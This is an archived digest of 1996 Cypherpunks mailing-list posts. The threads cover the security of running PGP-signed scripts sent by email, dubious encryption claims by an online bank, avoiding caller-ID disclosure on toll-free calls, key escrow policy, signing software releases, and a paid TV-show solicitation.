Message-ID: <Pine.LNX.3.94.960713180741.2563A-100000@gak>
MIME-Version: 1.0
Content-Type: multipart/signed; boundary="Boundary..3943.1071713593.multipart/signed"

--Boundary..3943.1071713593.multipart/signed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

On Sat, 13 Jul 1996, Steffen Zahn wrote:

> I suggest ignoring Reply-To: etc and requiring a return address inside
> the signed region of the mail, otherwise someone could intercept the mail
> (suppressing the original) and resend it from his account and the results
> would get sent to the interceptor.

I agree.  Having a return address outside the signature allows for denial-of-
service attacks and it would be trivial to intercept the output of the script.
Definitely not a Good Thing.

>  Another idea would be to extract the return address from the PGP userid
> which signed the script.

There are a couple of problems with this idea:

	- The security of this scheme depends on trusting the user to sign her
	key.  If the user doesn't, than an attacker can intercept the user's
	key and alter the key ID.

	- Even if the user does sign her key, there is still the problem of
	an attacker being able to generate a key with an identical key ID and
	and a different user ID.  If the attacker has the ability to intercept
	and modify messages, a MITM attack would be very effective.  If the
	key's fingerprint was included in the signed message, an MITM attack
	would be necessary to subvert the system.

If the key's fingerprint is included in the message, then it certainly wouldn't
take much more effort to put a return address in the signed body of the
message.

-- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
"Freedom is the freedom to say that two plus two make four.  If that
is granted, all else follows."  --George Orwell, _1984_



--Boundary..3943.1071713593.multipart/signed
Content-Type: application/octet-stream; name="pgp00002.pgp"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="pgp00002.pgp"
Content-Description: "PGP signature"

LS0tLS1CRUdJTiBQR1AgU0lHTkFUVVJFLS0tLS0KVmVyc2lvbjogMi42LjMK
CmlRQ1ZBd1VCTWVnZ2lMWmMrc3Y1c2l1bEFRR09Hd1FBaXNkc0J6Zzc4UE5X
TzAvbGtYWnh4TlZuSnRBTUQweW4KRk9nczRoWEFDUXA0NkNoOUdEOU84d3ox
RzNwNUpmbWdYUFV6emFzOS9qalZZUCtvdmNWODg3cWdycDNucHQ4NQptZFB4
Z0JnbFhCak9Gdkp6eU9XVUhYc094RzRMYkp4MmtkZGx4WjhZOC9RazJ6OC9u
YVBxM0xySW5NUDhsVnF5CnBXdnQrUitubk9rPQo9a3J3SgotLS0tLUVORCBQ
R1AgU0lHTkFUVVJFLS0tLS0K
--Boundary..3943.1071713593.multipart/signed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steffen Zahn <zahn@berlin.snafu.de>
Date: Sun, 14 Jul 1996 05:14:47 +0800
To: mcarpent@mailhost.tcs.tulane.edu
Subject: Re: Execution of signed scripts received by e-mail
In-Reply-To: <199607130841.DAA00240@Dusk.obscure.net>
Message-ID: <199607131624.SAA01131@zahn.berlin.snafu.de>
MIME-Version: 1.0
Content-Type: text/plain


    Matt> Get one input line at a time, and look for Reply-To: and
    Matt> From: headers to get a reply address.  As we are slurping up
    Matt> lines, watch for '-----BEGIN PGP' lines.  If it is for

I suggest ignoring Reply-To: etc and requiring a return address inside
the signed region of the mail, otherwise someone could intercept the mail
(suppressing the original) and resend it from his account and the results
would get sent to the interceptor.
 Another idea would be to extract the return address from the PGP userid
which signed the script.

Regards
  Steffen

-- 
work: Steffen.Zahn%robinie@emndev.siemens.co.at | home: zahn@berlin.snafu.de
      phone:+49-30-38624969                     |       phone:+49-30-4732126
Any opinions expressed herein are not necessarily those of my employer.
Use of my addresses for unsolicited commercial advertising is forbidden.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sun, 14 Jul 1996 10:14:13 +0800
To: cypherpunks@toad.com
Subject: Cybank breaks new ground; rejects public-key encryption
Message-ID: <v03007606ae0dd5274a4e@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


Sender: e$@thumper.vmeng.com
Reply-To: Ian Grigg <iang@systemics.com>
MIME-Version: 1.0
Precedence: Bulk
Date: Sat, 13 Jul 1996 22:55:43 +0200
From: Ian Grigg <iang@systemics.com>
To: Multiple recipients of <e$@thumper.vmeng.com>
Subject: Cybank breaks new ground; rejects public-key encryption

This taken from their pages (http://www.cybank.net/cb-encr.htm)
---------------------------------
                  Security and Encryption

  Cybank software is protected by multiple encryption and identification
  systems, some can be seen, others are invisible.

  Cybank cash can be traced back to the original account it belongs to.

  Cash Keys cannot effectively be modified with disabling them.

  Because cash keys are also password protected, they can only be created and
  spent by the authorised account holder.

  Cybank uses an encryption matrix of 380 characters. Cybank can safely
  transfer any Cash Key or message from point A to point B via the Internet.
  Cybank DOES NOT use Public Key Encryption (which has proven to be
  insecure).

  Here is a sample encrypted code, see if you can understand it:

  193404158201838932119642777371870823541340764 [...]
-------------------------------

I wonder if they intend to publish the protocols :-)

--
iang
iang@systemics.com


--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Yap Remailer <remailer@yap.pactitle.com>x@x.x
Date: Sun, 14 Jul 1996 13:42:58 +0800
To: cypherpunks@toad.com
Subject: Re: CDT Policy Post 2.27 - No New News on Crypto: Gore Restates Suppor
In-Reply-To: <v02140b1bae0c80b15a2e@[204.157.127.16]>
Message-ID: <199607140215.TAA25137@yap.pactitle.com>
MIME-Version: 1.0
Content-Type: text/plain


Can someone explain what, if any, effect this might have on domestic
use of encryption?  When they say relaxing export restrictions in
exchange for escrow, that still just means escrow for exportable
products (which they are hoping will be almost everything), right?

Is there any danger of domestic encryption without escrow being
outlawed?

Thanks.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: charris@eden.com (Carol Harris)
Date: Sun, 14 Jul 1996 08:23:25 +0800
To: Roger Williams <roger@coelacanth.com>
Subject: Re: Can't block caller ID in Massachusetts?
In-Reply-To: <Pine.SUN.3.91.960713001239.14285A-100000@sunspot.tiac.net>
Message-ID: <31e7f9b7.16524735@mail.eden.com>
MIME-Version: 1.0
Content-Type: text/plain


FYI  - AT&T Wireless had announced they would begin passing through 
CLID information on cellular phones in the Austin, Texas area
effective June 15, 1996.  I don't know how this affects ANI or what
other areas are doing, but I wouldn't  assume your cellular phone # is
not being passed through.

On 13 Jul 1996 12:25:07 -0500, you wrote:

>>>>>> "Millie" == sfuze@tiac net <sfuze@sunspot.tiac.net> writes:
>
>  > Here's how you STOP the 800 people from getting your number:
>
>  > DIAL THE OPERATOR and have her put the call through...
>
>Or place the call with your cellular phone -- AFAIK, CLID and ANI
>information doesn't get passed along on cell phone calls.
>
>-- 
>Roger Williams                         finger me for my PGP public key
>Coelacanth Engineering        consulting & turnkey product development
>Middleborough, MA           wireless * DSP-based instrumentation * ATE
>tel +1 508 947-8049 * fax +1 508 947-9118 * http://www.coelacanth.com/
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sun, 14 Jul 1996 14:52:04 +0800
To: "Mark M." <markm@voicenet.com>
Subject: Re: ANI Blocking! Fast, Easy, Effective! (fwd)
In-Reply-To: <Pine.LNX.3.94.960713141046.240B-100000@gak>
Message-ID: <Pine.SUN.3.91.960713200928.2586D-100000@crl7.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Sat, 13 Jul 1996, Mark M. wrote:

> It might be cheaper to use a pre-paid phone card.  However,
> the company that issues the card has access to your ANI
> information.

True, but so what?  If you are calling L.L.Beam's 800 number, 
and you don't want them to know who you are, do you really think 
Beam will be able to get that info from the pre-paid calling card 
company?  If you want to call a snitch line, on the other hand, 
use a pay phone.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sun, 14 Jul 1996 11:52:05 +0800
To: "Bruce M." <bkmarsh@feist.com>
Subject: Re: Can't block caller ID in Massachusetts?
In-Reply-To: <Pine.BSI.3.91.960713082927.14968A-100000@wichita.fn.net>
Message-ID: <Pine.SV4.3.91.960713201318.16808C-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


> >    Privacy isn't for parasites. It's for people who are willing to pay for
> >    their own phone calls. 
> 
>     That is interesting as I don't recall ever being offered a choice of 
> toll free or being billed when I dial an 800 number (sometimes the only 
> number offered for a company).


 I haven't noticed too many business telephones that don't appear in 
Directory Assistance.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sun, 14 Jul 1996 14:45:23 +0800
To: "Bruce M." <bkmarsh@feist.com>
Subject: Re: ANI Blocking! Fast, Easy, Effective! (fwd)
In-Reply-To: <Pine.BSI.3.91.960713141207.357A-100000@wichita.fn.net>
Message-ID: <Pine.SUN.3.91.960713201544.2586E-100000@crl7.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Sat, 13 Jul 1996, Bruce M. wrote:

>     Why not increase your level of precaution and use your pre-paid phone 
> card to dial the number that ripco advertised and then dial out from 
> there?

Or by chaining two or more pre-paid calling cards.  It's all
economics.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "sfuze@tiac.net" <sfuze@sunspot.tiac.net>
Date: Sun, 14 Jul 1996 12:40:18 +0800
To: Deranged Mutant <WlkngOwl@unix.asb.com>
Subject: Re: Dep. AG Gorelick on CSPAN2 advocating escrow
In-Reply-To: <199607131751.NAA13385@unix.asb.com>
Message-ID: <Pine.BSF.3.91.960713210609.21922B-100000@laraby.tiac.net>
MIME-Version: 1.0
Content-Type: text/plain


But, as in the case of any PHYSICAL (ie: security box at the bank, blah 
blah blah) items, at least in escrow, if you DON'T have the key, then you 
don't get the loot.

If we fight for the same rights, at a minimum, in both the physical AND 
the electronic forums (and we should have more of both! :)), then this 
case should be no different than any other case.

"Property goes unclaimed".  That's why lawyers invented wills (or WHOEVER 
did... <G>)

--Millie.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bruce M." <bkmarsh@feist.com>
Date: Sun, 14 Jul 1996 13:48:12 +0800
To: Alan Horowitz <alanh@infi.net>
Subject: Re: Can't block caller ID in Massachusetts?
In-Reply-To: <Pine.SV4.3.91.960713201318.16808C-100000@larry.infi.net>
Message-ID: <Pine.BSI.3.91.960713212401.29352B-100000@wichita.fn.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 13 Jul 1996, Alan Horowitz wrote:

> Bruce M. wrote:
> >     That is interesting as I don't recall ever being offered a choice of 
> > toll free or being billed when I dial an 800 number (sometimes the only 
> > number offered for a company).
> 
>  I haven't noticed too many business telephones that don't appear in 
> Directory Assistance.

    That is assuming that you know which area they are located in.  

                       ________________________________
                      [ Bruce M. - Feist Systems, Inc. ]
                       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
     "Official estimates show that more than 120 countries have or are 
      developing [information warfare] capabilities." -GAO/AIMD-96-84





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lyal Collins <lyalc@ozemail.com.au>
Date: Sun, 14 Jul 1996 00:36:03 +0800
To: Anonymous User <nobody@c2.org>
Subject: Re: Reasonable validation of a software package
In-Reply-To: <199607121405.HAA09514@infinity.c2.org>
Message-ID: <31E87985.6EF9@ozemail.com.au>
MIME-Version: 1.0
Content-Type: text/plain


This touches upon a favourite rant of mine.

Anonymous User wrote:
> 
> Fellow cpunks:
> 
> I am working on various software packages for UNIX and
> Windows and since this is commercial work and prior NDA's
> are involved, I can't include the source code for
> absolute validation.
> 
> What would assure one that a package has not been tampered
> with from the company to the user?

If someone had your public key, and a trusted software module 
with which to use it, you could use a "Digital Signature".
PGP offers such data integrity and signing functions.
You also indicate you have PGP - even better.

So, now you are left with ensuuring people have your public key,
and the recipient having a trusted software tool.
Again, PGP is relatively well accepted in this regard.
Trusted - depends on the source of the recipient's
copy.

So, now you need to ensure that you can get your public key 
(to verify the digital signature with) in the hands of all 
your possible, or intended, recipients. 

Now the race is on for as many people as possible to generate 
PGP public keys/certificates bearing your name, or variations 
of it. Once that occurs, there is a fair chance that one of 
these keys will verfiy the digital signature on a piece of
software purportedly from you. Still, not many people will have 
your true PGP public key/certificate, but, them's the breaks.


> 
> (Currently, I am using PKZIP's rather anemic AV protection,
> as well as signing the archive with my PGP key.  I am
> wondering if there are any other steps I need to take to
> assure that a package came from me, and wasn'tSee above - easy or difficult - how much assurance do you want ?

> damaged/altered/tampered with in transit.)See above - easy or difficult - how much assurance do you want ?

> 
> Thanks in advance.

lyal

-- 
All mistakes in this message belong to me - you should not use them!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 14 Jul 1996 17:32:42 +0800
To: Roger Williams <roger@coelacanth.com>
Subject: Re: Can't block caller ID in Massachusetts?
Message-ID: <199607140450.VAA17305@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:25 PM 7/13/96 -0500, Roger Williams wrote:

>Certainly, though, if I was calling the BATF toll-free to rat on my
>neighbourhood Uzi dealer, I'd never call from my own phone, anonymous
>re-phoner or not.


A question to ponder:  If (anonymous) pay telephones didn't already exist, 
would they be allowed today?

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Roger Williams <roger@coelacanth.com>
Date: Sun, 14 Jul 1996 13:52:17 +0800
To: "sfuze@sunspot.tiac.net>
Subject: Re: Can't block caller ID in Massachusetts?
In-Reply-To: <Pine.SUN.3.91.960713164442.13725A-100000@sunspot.tiac.net>
Message-ID: <rogerk9w7qzx8.fsf@sturgeon.coelacanth.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Millie" == sfuze@tiac net <sfuze@sunspot.tiac.net> writes:

  > I'd never use a cellular to place a call of importance anyway.

  > We all know how easily cellular can be intercepted, I hope...  And
  > EVERY number you ever call on a cellular is logged too.

Yes, except that we weren't talking about securing the privacy of the
conversation; we were discussing methods of keeping the identity of
the caller from being reported to WATS-line customers.

Until recently at least, ANI and CLID information was not available
on calls from cellular phones (the rationale was that the cellular
phone customer has to pay for *incoming* calls as well).  I thought
that this was mandated by law, in Mass anyway.

Certainly, though, if I was calling the BATF toll-free to rat on my
neighbourhood Uzi dealer, I'd never call from my own phone, anonymous
re-phoner or not.

-- 
Roger Williams                         finger me for my PGP public key
Coelacanth Engineering        consulting & turnkey product development
Middleborough, MA           wireless * DSP-based instrumentation * ATE
tel +1 508 947-8049 * fax +1 508 947-9118 * http://www.coelacanth.com/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sparks@bah.com (Charley Sparks)
Date: Mon, 15 Jul 1996 01:35:52 +0800
To: cypherpunks@toad.com
Subject: Re: Needed: Bay Area "Cracker" for TV Show
Message-ID: <v01540b00ae0e10fb83e9@[156.80.2.175]>
MIME-Version: 1.0
Content-Type: text/plain


Perhaps we should spam them with responses and encrypt all of them ??

only a small Sunday morning thought !


no reason for a sig... CP wannabe


>From: anvil@encryption.com
>Date: Sun, 14 Jul 96 02:32:20 PDT
>Mime-Version: 1.0
>Subject: Re: Needed: Bay Area "Cracker" for TV Show
>To: cypherpunks@toad.com
>Sender: owner-cypherpunks@toad.com
>Precedence: bulk
>
>
>
>On Fri, 12 Jul 1996, Alan Horowitz <alanh@infi.net> wrote:
>>> July 11th, a San Francisco television reporter called me. He wants to
>>> broadcast a story about "crackers". He'd like someone who can describe,
>>> on-the-air
>>
>>
>>Hey peachpit
>>
>>The cartoon news broadcasts are part of the problem, not part of the
>>solution.
>>
>
>And apparently they'd like to charge you to *be* part of the problem. I
>offer the
>following (I'd like to file this under 'clueless', but you never know...)
>
>===========================================================================
>=======
>Return-Path: <patty@cyberone.com>
>Received: from cyberone.com ([206.102.194.2]) by pulm1.accessone.com
>(4.1/SMI-4.1)
>id AA23842; Fri, 12 Jul 96 16:32:30 PDT
>Received: by cyberone.com (940816.SGI.8.6.9/940406.SGI) for
>anvil@ACCESSONE.COM id
>TAA21956; Fri, 12 Jul 1996 19:23:20 -0400
>Date: Fri, 12 Jul 1996 19:23:20 -0400
>From: patty@cyberone.com (Patty Elliot)
>Message-Id: <199607122323.TAA21956@cyberone.com>
>Subject: Your site: ENCRYPTION.COM
>Apparently-To: anvil@ACCESSONE.COM
>X-UIDL: 837333887.020
>
>Dear Sir,
>We are producing the national television series .com hosted by Star Wars
> celebrity Mark Hamill.  The series airs nationally on CNBC and the Bravo
> Network and is all about the Internet and how it is changing the way we do
> business.  We are reviewing storylines and Web Sites to be featured in
>our fall
> programming.
>
> We have featured stories on digital Imaging including Kodak, on-line banking
> with Digital Insight, and Healthful On Line Web Sites such The American Heart
> Association as well as many others.
>
> Please take this time to complete this brief questionnaire and we will
>consider
> your story and Web Site as a feature on the show.  If the story or Web
>Site fits
> our programming requirements, one of our producers will contact you.
>
> There is a pre-production fee to participate on the show which offsets
>some of
> the pre-production costs, however we pay for all of the production and post
> production costs.
>
> Please allow us at least one week to review your response and your web site,
> Thank-you.
>
>
>
> Patty Elliot
> Vice President, Programming
>
>
> Questionnaire
>
>
> What is your URL:   http://www. _______________________
>
> What kind of information is available at your Web Site?
>
> What is the message you would like to communicate to the viewer?
>
> What are the most important functions of the Web Site?
>
> Who are you trying to reach?
>
> Where are you promoting now?
>
> Is your company a public or private company?
>
> How many employees are devoted to managing your web site?
>
> What sales category would your company fall?
> (Less  then 1 mill) :
> (1-5 mill):
> (6-50 mill):
> (51-100 mill):
> (101 mill +):
>
> Who is in charge of marketing your Web Site?
>
>
> Name:  Title:
>
> Tel:
>
> Fax:
>
> email:
>
> Address:
>
>
>
>
>--
>J R Slack     I'm not really a cryptographer, I just play one on the Internet.
>68 FLH,      "In wildness is the preservation of the world" - H.D. Thoreau
>63 R60       "In wildness is the preservation of the soul"  - H.D. Motorcycles
>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jim Pinson" <jpinson@polaris.net>
Date: Sun, 14 Jul 1996 14:35:50 +0800
To: cypherpunks@toad.com
Subject: Executing remote commands with PGP
Message-ID: <199607140311.XAA08985@polaris.net>
MIME-Version: 1.0
Content-Type: text/plain


I lost the original subject of this thread, but some one was writing
about  sending commands via PGP.

A few years ago I wrote such a perl script.   It was part of a simple
remailer I developed.

At the time I was living overseas, and wanted to be able to send and
receive encrypted mail to my friends who did not use PGP.

The simple remail script was installed on a Stateside computer, and
took all plain text messages it received and encrypted them with my
public key and relayed them to me.   

I could send encrypted mail to the remailer, have it decrypted, and
sent on to the final destination.  The net result was an unencrypted
mail stream within the States, but an encrypted stream to me overseas.
 
As a bonus I added a few lines to let me send commands to the remailer
(embedded in the encrypted messages), have them executed on the remote
computer, and the results sent back to me.

Nothing fancy here, but it worked.

I stuck the code on:
http://www.polaris.net/~jpinson

There is little documentation, just a few comments in the source, I
don't use it any more but perhaps someone might find it useful.

Look under software in my home page section.

There is also an enhanced one time pad there I wrote some time back.

Jim Pinson




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sun, 14 Jul 1996 19:49:36 +0800
To: cypherpunks@toad.com
Subject: Chicago Physcial Meet?
Message-ID: <Pine.LNX.3.93.960714003131.2062A-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain



     I was exchanging email with another member of the list late last
week, and they brought up the possibility of a physcial meet for the 
greater Chicago Area Cyhperpunks. 

     Would there be interest in such an event?


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anvil@encryption.com
Date: Sun, 14 Jul 1996 21:10:48 +0800
To: cypherpunks@toad.com
Subject: Re: Needed: Bay Area "Cracker" for TV Show
In-Reply-To: <Pine.SV4.3.91.960712190148.22163C-100000@larry.infi.net>
Message-ID: <9607140932.AA06667@pulm1.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 12 Jul 1996, Alan Horowitz <alanh@infi.net> wrote:
>> July 11th, a San Francisco television reporter called me. He wants to
>> broadcast a story about "crackers". He'd like someone who can describe,
>> on-the-air
>
>
>Hey peachpit
>
>The cartoon news broadcasts are part of the problem, not part of the 
>solution.
>

And apparently they'd like to charge you to *be* part of the problem. I offer the 
following (I'd like to file this under 'clueless', but you never know...)

==================================================================================
Return-Path: <patty@cyberone.com>
Received: from cyberone.com ([206.102.194.2]) by pulm1.accessone.com (4.1/SMI-4.1) 
id AA23842; Fri, 12 Jul 96 16:32:30 PDT
Received: by cyberone.com (940816.SGI.8.6.9/940406.SGI) for anvil@ACCESSONE.COM id 
TAA21956; Fri, 12 Jul 1996 19:23:20 -0400
Date: Fri, 12 Jul 1996 19:23:20 -0400
From: patty@cyberone.com (Patty Elliot)
Message-Id: <199607122323.TAA21956@cyberone.com>
Subject: Your site: ENCRYPTION.COM
Apparently-To: anvil@ACCESSONE.COM
X-UIDL: 837333887.020

Dear Sir,
We are producing the national television series .com hosted by Star Wars 
 celebrity Mark Hamill.  The series airs nationally on CNBC and the Bravo 
 Network and is all about the Internet and how it is changing the way we do 
 business.  We are reviewing storylines and Web Sites to be featured in our fall 
 programming.
 
 We have featured stories on digital Imaging including Kodak, on-line banking 
 with Digital Insight, and Healthful On Line Web Sites such The American Heart 
 Association as well as many others. 
 
 Please take this time to complete this brief questionnaire and we will consider 
 your story and Web Site as a feature on the show.  If the story or Web Site fits 
 our programming requirements, one of our producers will contact you.       
 
 There is a pre-production fee to participate on the show which offsets some of 
 the pre-production costs, however we pay for all of the production and post 
 production costs.
 
 Please allow us at least one week to review your response and your web site, 
 Thank-you.
 
 
 
 Patty Elliot
 Vice President, Programming
 
 
 Questionnaire
 
 
 What is your URL:   http://www. _______________________
 
 What kind of information is available at your Web Site?      
 
 What is the message you would like to communicate to the viewer?
  
 What are the most important functions of the Web Site?
 
 Who are you trying to reach?
 
 Where are you promoting now?
 
 Is your company a public or private company?
 
 How many employees are devoted to managing your web site?
 
 What sales category would your company fall?    
 (Less  then 1 mill) :
 (1-5 mill): 
 (6-50 mill):
 (51-100 mill):
 (101 mill +):  
 
 Who is in charge of marketing your Web Site?
 
 
 Name:	Title:
 
 Tel:
 
 Fax:
 
 email:
 
 Address:
 



-- 
J R Slack     I'm not really a cryptographer, I just play one on the Internet.
68 FLH,      "In wildness is the preservation of the world" - H.D. Thoreau
63 R60       "In wildness is the preservation of the soul"  - H.D. Motorcycles





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Sun, 14 Jul 1996 20:21:18 +0800
To: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Subject: Re: Crypto-activism
Message-ID: <199607140700.DAA16452@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


BTW, Sent this message to you the other day. It was bounced back...

   ----- Unsent message follows -----
Received: from unix.asb.com by giasdl01.vsnl.net.in;
(5.65v3.2/1.1.8.2/23Apr96-0134AM)
 id AA09399; Sat, 13 Jul 1996 10:32:46 +0500
Received: from magneto (sls17.asb.com [165.254.128.27]) by
unix.asb.com (8.6.12/8.6.9) with SMTP id BAA16194 for
<amehta@giasdl01.vsnl.net.in>; Sat, 13 Jul 1996 01:20:32 -0400
Message-Id: <199607130520.BAA16194@unix.asb.com> Comments:
Authenticated sender is <wlkngowl@unix.asb.com> From: "Deranged
Mutant" <WlkngOwl@unix.asb.com> Organization: What organization? To:
Arun Mehta <amehta@giasdl01.vsnl.net.in> Date: Sat, 13 Jul 1996
01:03:41 +0000 Subject: PGP Key Priority: normal X-Mailer: Pegasus
Mail for Win32 (v2.32a)

Arun,

No offense is meant at my posts, BTW.  Just that I've seen seen some
crazy schemes by activists who ignored the subtlety of some issues and
do more harm than good. (Old pat phrase about road to hell being paved
with good intentions...).  Particularly with activists from
"out-of-town"  who claim to know what's better for the locals.

Took a look at your home page,BTW. No public key on it, checked the
servers.  Also saw you graduated from SUNY in '76.  Which school?
(I've got a BA from SUNY Stony Brook recently, though not in
comp-sci...)

Peace,

Rob

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

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
aywgTlkgMTE3OTAgVVNB
=aX7r
-----END PGP PUBLIC KEY BLOCK-----


---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send
help" Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
